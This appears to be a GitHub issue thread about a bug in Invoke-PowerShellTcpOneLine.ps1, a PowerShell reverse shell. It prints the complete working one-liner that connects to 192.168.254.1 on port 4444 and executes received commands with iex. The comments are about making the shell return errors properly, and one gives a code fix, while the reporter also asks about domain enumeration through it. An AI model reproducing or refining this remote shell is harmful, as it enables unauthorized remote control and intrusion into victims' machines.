Invoke-PowerShellTcpOneLine.ps1 prints newline between successive lines. #63
Comments
|
The newline is because of Out-String. As PowerShellv2 (or even v5) does not support a -NoNewLine parameter, I can't see of any easy way to fix it without increasing the length of the reverse shell. |
|
For the error part, this script does not send error on the network stream. You cannot see the complete message because of this. You may like to use Invoke-PowerShellTcp to resolve this problem. |
|
Thank you - but, Indeed, |
I found a fix for this, Im getting errors back in the network stream. Change line 76 to: $result = (Invoke-Expression -Command $response) 2>&1 | Out-String |
The "Invoke-PowerShellTcpOneLine.ps1" reverse shell prints new lines between successive lines for, e.g. the
lscommand. I'm using netcat as the listener to which the shell connects.I've looked at the code, and I can't seem to locate the issue:
#$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()How could it be fixed?
Furthermore, using commands like
net users /domainonly returns the "The request will be processed at a domain controller for domain..." intermediary response, and not the full response from the domain controller?The text was updated successfully, but these errors were encountered: